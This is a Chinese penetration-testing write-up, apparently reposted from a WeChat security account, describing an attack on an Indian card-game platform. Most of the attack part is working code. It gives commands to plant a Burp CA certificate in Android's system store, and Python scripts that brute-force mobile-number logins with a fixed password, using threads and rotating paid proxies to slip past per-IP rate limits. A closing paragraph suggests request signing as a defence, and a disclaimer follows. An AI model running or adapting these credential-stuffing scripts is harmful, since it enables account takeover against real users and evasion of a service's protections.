-
用的xiaocms,阉割了前台的留言功能,导致无法实现后台csrf操作 -
可以暴力破解,但不知道用户名,被破解的概率很小 -
暂时没其他思路
openssl x509 -inform DER -in burp.cer -out burp.pemopenssl x509 -inform burp.pem -subject_hash_old burp.pem将上面证书8位hash对pem进行重命名:burp.pem > 9a3b2a3e.0将9a3b2a3e.0推送到安卓系统证书根目录:adb push 9a3b2a3e.0 /system/etc/security/cacerts/adb shell chmod 644 /system/etc/security/cacerts/9a3b2a3e.0adb shell chgrp root /system/etc/security/cacerts/9a3b2a3e.0
import requestsurl = "https://aaaa.com/login/moblie"for num in range(999999):num_str = "{:06d}".format(num)mobile = f"919840{num_str}"data = {"mobile":mobile,"password":"abcd123456","ipInfo":{"status":"success"}}try:res = requests.post(url=url,json=data,timeout=5)print(mobile+","+res.text)except:print("request failed")
nohuppython3mobile_brute.py>result.log2>&1 &
import requestsfrom concurrent.futures import ThreadPoolExecutorimport datetimedef brute(start,end):url="https://target/user/login/mobile"fornuminrange(start,end):num_str ="{:06d}".format(num)mobile = f"919840{num_str}"data= {"mobileNo":mobile,"password":"a123456","ipInfo":{"status":"success"}}try:res = requests.post(url=url,json=data, proxies=proxies,timeout=10)print(mobile+","+res.text)exceptExceptionase:print(mobile+str(e))if__name__ =='__main__':startime = datetime.datetime.now()num= [{"start":1,"end":100000},{"start":100001,"end":200000},{"start":200001,"end":300000},{"start":300001,"end":400000},{"start":400001,"end":500000},{"start":500001,"end":600000},{"start":600001,"end":700000},{"start":700001,"end":800000},{"start":800001,"end":900000},{"start":900001,"end":999999}]withThreadPoolExecutor(max_workers=10)asexecutor:foriinrange(10):executor.submit(lambda cxp:brute(*cxp),(num[i].get('start'),num[i].get('end')))endtime = datetime.datetime.now()print(endtime-startime)
nohup python3 mobile_brute.py > result.log 2>&1 &
这显然有些不正常,拿了第一个success对应的手机号去APP里登录,919843558247,提示该手机号未注册。
代理的选择:调研了几家IP代理池商家,其中有几种代理模式:residential、datacenter、ISP,residential是私人家里的用的IP,datacenter是全球各地机房的IP。两种模式都有static和rotaing模式。对于我而言,能自动切换IP是最好的,所以选择了datacenter的rotaing模式,用的share共享代理池,性价比最高。
先尝试下能否动态切换IP代理
import requestsfrom concurrent.futures import ThreadPoolExecutorimport datetimedef brute(start,end):proxy_user = "*********"proxy_pass = "*****"proxies = {"http": f"http://{proxy_user}:{proxy_pass}@pr.****.com:16666",'https': f'http://{proxy_user}:{proxy_pass}@pr.****.com:16666'}url = "https://target.com/user/login/mobile"for num in range(start,end):num_str = "{:05d}".format(num)mobile = f"9198450{num_str}"data = {"mobileNo":mobile,"password":"a123456","ipInfo":{"status":"success"}}try:res = requests.post(url=url, json=data, proxies=proxies, timeout=10)text = mobile + "," + res.textprint(text)except Exception as e:timeout_mobile = mobile+",timeout"print(timeout_mobile+","+str(e))if __name__ == '__main__':startime = datetime.datetime.now()num = [{"start":1,"end":10000},{"start":10001,"end":20000},{"start":20001,"end":30000},{"start":30001,"end":40000},{"start":40001,"end":50000},{"start":50001,"end":60000},{"start":60001,"end":70000},{"start":70001,"end":80000},{"start":80001,"end":90000},{"start":90001,"end":99999}]with ThreadPoolExecutor(max_workers=4) as executor:for i in range(10):executor.submit(lambda cxp:brute(*cxp),(num[i].get('start'),num[i].get('end')))endtime = datetime.datetime.now()print(endtime-startime)
最后我想说的是,攻击和防御其实最重要的是投入产出比,过度投入成本防御并不一定好,ROI可能是负的。本次案例,我觉得对方做的策略就挺好,通过判断单个IP频繁请求来限制访问业务,攻击者就需要去买代理池,甚至为了提高产出率会加机器分布式去撞成本更高了。从甲方角度来说,这里其实可以做的更加安全一些,都不需要投入过多的投入成本,只需要对每个请求进行数字签名就ok,客户端加签逻辑代码、Hmac key做混淆,就需要攻击者花大量的时间成本去反编译客户端,有些加签功能还是通过加载.so动态进行的,要找到签名逻辑和密钥更加困难了。
原文始发于微信公众号(渗透安全团队):实战 | 渗透印度棋牌游戏平台
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论